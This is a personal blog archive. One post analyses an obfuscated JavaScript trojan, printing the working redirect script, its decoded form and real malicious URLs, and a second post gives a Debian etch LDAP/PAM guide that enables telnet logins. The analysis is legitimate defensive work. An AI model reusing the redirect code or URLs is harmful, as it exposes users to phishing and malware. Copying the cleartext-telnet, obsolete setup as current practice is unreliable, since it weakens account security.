Archive for the ‘Technology’ Category

Oh boy! Obfuscated Trojans oh my.

June 11th, 2010

New phishing/trojan JavaScripts are running amok. Got this gem recently:

<script type='text/java script'>
function uK(){};
var kV='';
uK.prototype = {
f : function() {
d=4906;
var w=function(){};
var u=new Date();
var hK=function(){};
var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
var n=new Array();
var e=function(){};
var eJ='';
t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
this.nH=false;
eX=2280;
dF="dF";
var hN=function(){ return 'hN' };
this.g=6633;
var a='';
dK="";
function x(b){
var aF=new Array();
this.q='';
var hKB=false;
var uN="";
b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;
this.qO=15083;
uR='';
var hB=new Date();
s="s";
}
var dI=46541;
gN=55114;
this.c="c";
nT="";
this.bG=false;
var m=new Date();
var fJ=49510;
x(t);
this.y="";
bL='';
var k=new Date();
var mE=function(){};
}
};
var l=22739;
var tL=new uK();
var p="";
tL.f();
this.kY=false;
</script>

Which, after you remove the huge loads of crap, is:

<script type='text/java script'>
function uK(){};
uK.prototype = {
  f : function() {
    var h='http://lendermedia.com/images/z.htm';
    t=document['location'];
    function x(b) { b['href']=h; }
    x(t);
  }
};
var tL=new uK();
tL.f();
</script>

Which is simply document.location.href = http://lender media.com/images/z.htm, and that page in turn loads the following:

http://zoo jeans.ru:8080/index.php?pid=10 in an invisible iframe

http://told speak.com/ redirects here after 3s

Cute stuff, easy to decipher, but it’ll snag a lot of people since the message is directed from the originating domain back to itself, which is a bit different.
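As an added example (not code from the original post), here is a small static decoder for the 'noise string'.replace(/[chars]/g, '') idiom this sample leans on: it pulls the hidden strings out by pattern matching alone, so an analyst can triage a page like this without rendering or executing it. The three input lines are copied from the sample above; the function names are my own.

```javascript
// Added example (not from the original post): a static decoder for the
// '<noise string>'.replace(/[chars]/g, '') idiom the sample relies on.
// It recovers the hidden strings by regex alone, without running the script.

// Constructed input: the three obfuscated lines taken from the sample above.
const SAMPLE = [
  "var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\\^H\\!9X]/g, '');",
  "t=document['lDo6cDart>iro6nD'.replace(/[Dr\\]6\\>]/g, '')];",
  "b['hIrBeTf.'.replace(/[\\.BTAI]/g, '')]=h;",
].join('\n');

// Matches '<payload>'.replace(/[<class>]/g, '') and captures payload and class.
// The class may contain an escaped ']' (as in the sample's /[Dr\]6\>]/).
const IDIOM = /'([^']*)'\.replace\(\/\[([^\]]*(?:\\\][^\]]*)*)\]\/g,\s*''\)/g;

function decodeNoiseStrings(src) {
  const found = [];
  for (const m of src.matchAll(IDIOM)) {
    const [, payload, cls] = m;
    // Rebuild the character class exactly as the browser would parse it,
    // then apply the same deletion the script would have applied at runtime.
    const strip = new RegExp('[' + cls + ']', 'g');
    found.push({ encoded: payload, decoded: payload.replace(strip, '') });
  }
  return found;
}

// Anything that decodes to a URL is an indicator to block or to hunt for
// in proxy logs.
function extractUrls(src) {
  return decodeNoiseStrings(src)
    .map((r) => r.decoded)
    .filter((s) => /^https?:\/\//i.test(s));
}

console.log(decodeNoiseStrings(SAMPLE));
console.log('URLs:', extractUrls(SAMPLE));
```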

Technology

OpenLDAP, libnss, PAM

November 9th, 2008

To get from a base Debian etch (4.0) install to a working basic username/password/gecos system authentication against LDAP, here's what you do.

Start from a totally minimal base install (minimal, no additional repos). You must already have a working network at this point; I'll leave that to you…

Then…

edit /etc/apt/sources.list to read:

deb http://http.us.debian.org/debian etch main contrib non-free
deb http://security.debian.org/ etch/updates main contrib non-free
deb-src http://http.us.debian.org/debian etch main contrib non-free
deb-src http://security.debian.org/ etch/updates main contrib non-free

Update the system to current:

# apt-get update && apt-get upgrade (say yes if there are any upgrades)

Install what I consider essential apps and a reasonable build environment for later and slapd, libnss-ldap, and libpam-ldap:

# apt-get install autoconf automake1.9 bison build-essential bzip2 colordiff ctags debconf-utils debian-keyring elinks flex gcc-4.1-locales gdb gpm htop ldap-utils libltdl3-dev libmudflap0-dev libnss-ldap libpam-ldap libtool linux-headers-`uname -r` lynx mimedecode mime-support ncftp2 netcat nmap openssh-blacklist openssh-client openssh-server psmisc screen slapd ssh sysstat sysv-rc-conf telnet telnetd urlview vim vim-scripts

Replace /etc/ldap/slapd.conf with the following:

include         /etc/ldap/schema/core.schema
include         /etc/ldap/schema/cosine.schema
include         /etc/ldap/schema/nis.schema
include         /etc/ldap/schema/inetorgperson.schema
include         /etc/ldap/schema/misc.schema

pidfile         /var/run/slapd/slapd.pid
argsfile        /var/run/slapd/slapd.args
loglevel        0
modulepath      /usr/lib/ldap
moduleload      back_bdb
sizelimit 500
tool-threads 1
backend         bdb
checkpoint 512 30

database        bdb
suffix          "dc=fakedom,dc=dom"
rootdn          "cn=admin,dc=fakedom,dc=dom"
rootpw          (run slappasswd and paste output here)
directory       "/var/lib/ldap"
lastmod         on

access to attrs=userPassword,shadowLastChange
by dn="cn=admin,dc=fakedom,dc=dom" write
by anonymous auth
by self write
by * none

access to *
by dn="cn=admin,dc=fakedom,dc=dom" write
by * read

Replace /etc/nsswitch.conf with the following:

# /etc/nsswitch.conf
#
# Example configuration of GNU Name Service Switch functionality.
# If you have the `glibc-doc-reference' and `info' packages installed, try:
# `info libc "Name Service Switch"' for information about this file.

passwd:         compat ldap
group:          compat
shadow:         compat ldap

hosts:          files dns
networks:       files

protocols:      db files
services:       db files
ethers:         db files
rpc:            db files

netgroup:       nis

Replace /etc/libnss-ldap.conf with the following:

base dc=fakedom,dc=dom
uri ldap://127.0.0.1
ldap_version 3
rootbinddn cn=admin,dc=fakedom,dc=dom

Replace /etc/pam_ldap.conf with the following:

host 127.0.0.1
base dc=fakedom,dc=dom
uri ldap://127.0.0.1
ldap_version 3
rootbinddn cn=admin,dc=fakedom,dc=dom
pam_password exop

Replace /etc/ldap/ldap.conf with the following:

BASE    dc=fakedom,dc=dom
URI     ldap://127.0.0.1

Create a base.ldif file in /tmp to import into the directory to test against:

dn: dc=fakedom,dc=dom
objectClass: top
objectClass: dcObject
objectClass: organization
o: fakedom.dom
dc: fakedom

dn: cn=admin,dc=fakedom,dc=dom
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword: (Paste output from slappasswd)

dn: ou=People,dc=fakedom,dc=dom
ou: People
objectClass: organizationalUnit
objectClass: top

dn: uid=testy,ou=People,dc=fakedom,dc=dom
uid: testy
cn: testy
objectClass: account
objectClass: posixAccount
objectClass: top
loginShell: /bin/bash
uidNumber: 10000
gidNumber: 10000
homeDirectory: /home/testy
gecos: Testy,,,,
userPassword: (Paste output from slappasswd)

# /etc/init.d/slapd restart

# ldapadd -x -W -D 'cn=admin,dc=fakedom,dc=dom' -f /tmp/base.ldif  (enter the admin password when prompted)

# /etc/init.d/slapd restart

# getent passwd | grep testy  (should return testy's entry)

# /etc/init.d/openbsd-inetd start

# telnet localhost, then log in with testy's credentials; if it works, you're set

If it doesn’t… I’m sorry :)
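The two "(Paste output from slappasswd)" placeholders above, and rootpw in slapd.conf, take the {SSHA} value that slappasswd emits by default. As an added example (not code from the original post), here is that scheme written out, a verifier for it, and a helper that fills the placeholders in base.ldif; the LDIF excerpt and passwords are constructed for illustration.

```python
# Added example (not from the original post): the {SSHA} scheme that
# slappasswd emits by default, a verifier for it, and a helper that fills
# the two "(Paste output from slappasswd)" placeholders in base.ldif.
# Passwords and the LDIF excerpt below are constructed for illustration.
import base64
import hashlib
import hmac
import os
from typing import List, Optional

PLACEHOLDER = "(Paste output from slappasswd)"

# Excerpt of the post's base.ldif: only the two entries that carry a password.
BASE_LDIF = """dn: cn=admin,dc=fakedom,dc=dom
userPassword: (Paste output from slappasswd)

dn: uid=testy,ou=People,dc=fakedom,dc=dom
userPassword: (Paste output from slappasswd)
"""

def ssha_hash(password: str, salt: Optional[bytes] = None) -> str:
    """{SSHA}base64(sha1(password + salt) + salt); slappasswd uses a 4-byte salt."""
    if salt is None:
        salt = os.urandom(4)
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode("ascii")

def ssha_verify(password: str, stored: str) -> bool:
    """Check a candidate password against a {SSHA} userPassword/rootpw value.
    Works for any salt length: the SHA-1 digest is always the first 20 bytes."""
    if not stored.startswith("{SSHA}"):
        return False
    raw = base64.b64decode(stored[len("{SSHA}"):])
    digest, salt = raw[:20], raw[20:]
    candidate = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return hmac.compare_digest(candidate, digest)

def fill_ldif(template: str, admin_pw: str, user_pw: str) -> str:
    """Replace the placeholders in order: the admin entry first, then testy."""
    filled = template.replace(PLACEHOLDER, ssha_hash(admin_pw), 1)
    return filled.replace(PLACEHOLDER, ssha_hash(user_pw), 1)

def password_lines(ldif: str) -> List[str]:
    """Return the userPassword values of an LDIF, in document order."""
    return [line.split(": ", 1)[1] for line in ldif.splitlines()
            if line.startswith("userPassword: ")]
```

Note that rootbinddn in libnss-ldap.conf and pam_ldap.conf needs the admin password in clear text, read from /etc/libnss-ldap.secret and /etc/pam_ldap.secret (mode 0600), which the steps above do not create.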

General Stuff, Shadus Ramblings, Technology

The Move Is Done

June 4th, 2007

If you can read this, the move has been completed. Yay.

While I was moving all the domains I changed the software on marcus’ site.  I think the new software better serves the purpose we wanted for the site, although I really need to break the pictures up a bit.   Still waiting for the avengers domain to transfer to do the move for it… *twiddle*.

General Stuff, Technology
